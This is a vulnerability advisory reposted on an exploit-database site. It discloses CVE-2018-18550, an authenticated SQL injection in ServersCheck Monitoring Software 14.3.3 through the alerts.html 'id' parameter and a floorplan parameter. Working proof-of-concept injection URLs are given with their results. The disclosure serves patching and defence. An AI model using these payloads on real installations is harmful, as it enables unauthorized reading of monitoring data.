[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ServersCheck Monitoring Software 14.3.3 SQL Injection Vulnerability

Author
hyp3rlinx
Risk
[
Security Risk High
]
0day-ID
0day-ID-31397
Category
web applications
Date add
24-10-2018
Platform
windows
[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/CVE-2018-18550-SERVERSCHECK-MONITORING-SOFTWARE-SQL-INJECTION.txt
[+] ISR: ApparitionSec          
 
Greetz: ***Greetz: indoushka | Eduardo B.***


[Vendor]
www.serverscheck.com


[Product]
ServersCheck Monitoring Software - through 14.3.3

Software for monitoring your edge computing infrastructure, network & servers.

http://downloads.serverscheck.com/monitoring_software/setup.exe
File hash: b7bffe4fc83b6a4586c099d6c62d8eeb



[Vulnerability Type]
SQL Injection



[CVE Reference]
CVE-2018-18550


[Security Issue]
ServersCheck Monitoring Software allows for SQL Injection by an authenticated user via the alerts.html "id" parameter.



[References]
https://serverscheck.com/monitoring-software/release.asp



[Exploit/POC]
http://127.0.0.1:1272/alerts.html?id=18391

Result:
Alerts History for SENSORXY
No data available in table

Then using 'OR+2=2,

http://127.0.0.1:1272/alerts.html?id=18391+'OR+2=2+--+

Result:

Alerts History for test
155   a day ago   CPU on 127.0.0.1   Status Change   DOWN to OK   
154   a day ago   CPU on 127.0.0.1   Status Change   OK to DOWN   
153   a day ago   test   Status Change   OK to DOWN   Unable to connect to host


SQL Injection - original page results successfully manipulated using 18391-2
-----------------------------------------------------------------------------

Examples:

http://127.0.0.1:1272/alerts.html?id=18391
No data available in table

Then using 34 minus 2,

http://127.0.0.1:1272/alerts.html?id=18391-2
153   a day ago   test   Status Change   OK to DOWN   Unable to connect to host

and minus 1,

http://127.0.0.1:1272/alerts.html?id=18391-1
155   a day ago   CPU on 127.0.0.1   Status Change   DOWN to OK   
154   a day ago   CPU on 127.0.0.1   Status Change   OK to DOWN


http://127.0.0.1:1272/floorplans.html?floorplan=34
Floor Plan PLANXY

Then using 34 minus 2,

http://127.0.0.1:1272/floorplans.html?floorplan=34-2
Floor Plan 0

#  0day.today [2024-11-16]  #